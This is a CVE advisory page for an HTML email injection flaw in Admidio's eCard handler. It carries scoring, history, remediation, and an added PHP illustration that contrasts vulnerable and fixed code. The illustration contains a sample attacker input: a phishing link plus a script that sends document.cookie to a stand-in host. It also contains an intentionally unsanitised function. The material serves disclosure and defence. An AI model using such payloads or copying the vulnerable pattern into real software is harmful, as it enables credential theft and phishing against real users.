Description
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7.
Published: 2026-03-19
Score: 5.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Email Injection / Phishing
Action: Immediate Patch
AI Analysis

Impact

The vulnerability resides in the eCard send handler of Admidio. Instead of using the sanitized value from the form, the code uses the raw $_POST['ecard_message'] when composing the greeting card HTML. Consequently, an authenticated user can inject arbitrary HTML and JavaScript into a greeting card email. This bypasses the server‑side HTMLPurifier sanitization, allowing phishing content that appears legitimate to be sent to other members. The flaw could lead to credential theft or malware installation if victims interact with the injected content.
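To make the defect concrete, the following is an added, simplified model of the eCard send path written for this page; it is not Admidio's own handler code. It shows the three pieces the advisory describes: a validation step that builds $formValues by running the field through HTMLPurifier, the vulnerable composition that reads $_POST['ecard_message'] directly, and the corrected composition that only uses $formValues. It assumes HTMLPurifier is installed via Composer (vendor/autoload.php) and PHP 8 or later; the function names, the allowed-tag list and the attacker input are constructed for illustration.

```php
<?php
// Added example (not Admidio code): model of the eCard send path.
// Assumes ezyang/htmlpurifier installed via Composer and PHP >= 8.0.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

/**
 * Form validation: the message is passed through HTMLPurifier and the
 * clean value is stored in $formValues. The advisory says this step is
 * done correctly in Admidio; the bug is that it is not used afterwards.
 */
function validateEcardForm(array $post): array
{
    $config = HTMLPurifier_Config::createDefault();
    // Allow only the inline markup a greeting card legitimately needs
    // (allowlist chosen for this example, not Admidio's configuration).
    $config->set('HTML.Allowed', 'p,br,b,strong,i,em,a[href]');
    $config->set('URI.AllowedSchemes', ['http' => true, 'https' => true]);
    $purifier = new HTMLPurifier($config);

    return [
        'ecard_recipients' => array_map('intval', (array) ($post['ecard_recipients'] ?? [])),
        'ecard_message'    => $purifier->purify((string) ($post['ecard_message'] ?? '')),
    ];
}

/**
 * Vulnerable pattern: $formValues was computed, but the raw POST field
 * is what gets interpolated into the card HTML.
 */
function buildEcardHtmlVulnerable(array $post, array $formValues): string
{
    $message = $post['ecard_message'] ?? '';   // BUG: bypasses $formValues
    return '<div class="ecard-message">' . $message . '</div>';
}

/** Fixed pattern: only the purified value from $formValues reaches the mail body. */
function buildEcardHtmlFixed(array $formValues): string
{
    return '<div class="ecard-message">' . $formValues['ecard_message'] . '</div>';
}

// Constructed attacker input standing in for $_POST: a phishing link
// plus a script element that should never reach the recipient.
$post = [
    'ecard_recipients' => ['42'],
    'ecard_message'    => 'Hi! <a href="https://example.test/login">Re-confirm your account</a>'
        . '<script>location="https://example.test/steal?c="+document.cookie</script>',
];

$formValues = validateEcardForm($post);

$vulnerable = buildEcardHtmlVulnerable($post, $formValues);
$fixed      = buildEcardHtmlFixed($formValues);

printf("vulnerable contains <script>: %s\n", str_contains($vulnerable, '<script>') ? 'yes' : 'no');
printf("fixed contains <script>:      %s\n", str_contains($fixed, '<script>') ? 'yes' : 'no');
echo "fixed body: ", $fixed, "\n";
```

Run it with php on the command line after `composer require ezyang/htmlpurifier`. The vulnerable output keeps the script element; the fixed output drops it. Note what survives purification: the `<a href>` link is still present because links are on the allowlist, so even after the fix a member can send another member a convincing phishing link. What the fix restores is that the recipient's mail client is never handed active content or arbitrary markup from the sender; it does not turn the eCard feature into a content filter for phishing text, which is why the recommended actions below still include restricting who may send eCards.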

Affected Systems

Admidio, the open‑source user management solution. All installations of version 5.0.6 and earlier are vulnerable. The issue is resolved in version 5.0.7. The CNA identified the affected vendor/product as Admidio:admidio.

Risk and Exploitability

The CVSS 3.1 base score of 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) reflects a network-reachable flaw that needs only low privileges, but requires user interaction and has limited confidentiality and integrity impact; the changed scope captures the jump from the web application into the recipient's mail client. The EPSS score of less than 1% suggests a low probability of exploitation in the wild, and the flaw is not in the KEV catalog. An attacker must be authenticated and have permission to send eCards. The attack path is a crafted eCard message containing HTML or script, which the server embeds unsanitized in the greeting card email delivered to the chosen members or role. Most mail clients do not execute JavaScript, so the realistic payload is HTML that impersonates a legitimate Admidio message (for example a fake login link), yielding credential phishing from a sender address the recipient trusts. Overall the risk is moderate, with the main concern being targeted phishing inside communities that actively use the eCard feature.

Generated by OpenCVE AI on March 23, 2026 at 18:29 UTC.

Remediation

The vendor fix is the Admidio 5.0.7 release, which resolves the issue; no separate workaround is published. Installations that cannot upgrade immediately should apply the interim measures listed under Recommended Actions.

OpenCVE Recommended Actions

  • Update to Admidio version 5.0.7 or later as recommended by the vendor.
  • If an upgrade cannot be applied immediately, disable or restrict the eCard sending feature to trusted users only and closely monitor eCard activity.
  • Review application logs for suspicious eCard messages and audit user permissions for eCard sending.
  • If the eCard handler has been customized locally, verify that the greeting card HTML is built from the HTMLPurifier-sanitized $formValues['ecard_message'] and not from the raw $_POST['ecard_message'] value, and re-apply that change after upgrading.

Generated by OpenCVE AI on March 23, 2026 at 18:29 UTC.

Advisories
Source        ID                    Title
GitHub GHSA   GHSA-4wr4-f2qf-x5wj   Admidio has an HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
History

Wed, 25 Mar 2026 15:15:00 +0000

Type      Values Removed   Values Added
Metrics   -                ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 23 Mar 2026 17:00:00 +0000

Type   Values Removed   Values Added
CPEs   -                cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*

Fri, 20 Mar 2026 09:00:00 +0000

Type                 Values Removed   Values Added
First Time appeared  -                Admidio; Admidio admidio
Vendors & Products   -                Admidio; Admidio admidio

Thu, 19 Mar 2026 23:30:00 +0000

Type          Values Removed   Values Added
Description   -                Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7.
Title         -                Admidio: HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Weaknesses    -                CWE-79
References    -
Metrics       -                cvssV3_1: {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-25T14:48:54.765Z

Reserved: 2026-03-13T18:53:03.532Z

Link: CVE-2026-32757

Vulnrichment

Updated: 2026-03-25T14:48:45.363Z

NVD

Status : Analyzed

Published: 2026-03-20T00:16:16.930

Modified: 2026-03-23T16:52:29.850

Link: CVE-2026-32757

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-03-25T11:54:00Z

Weaknesses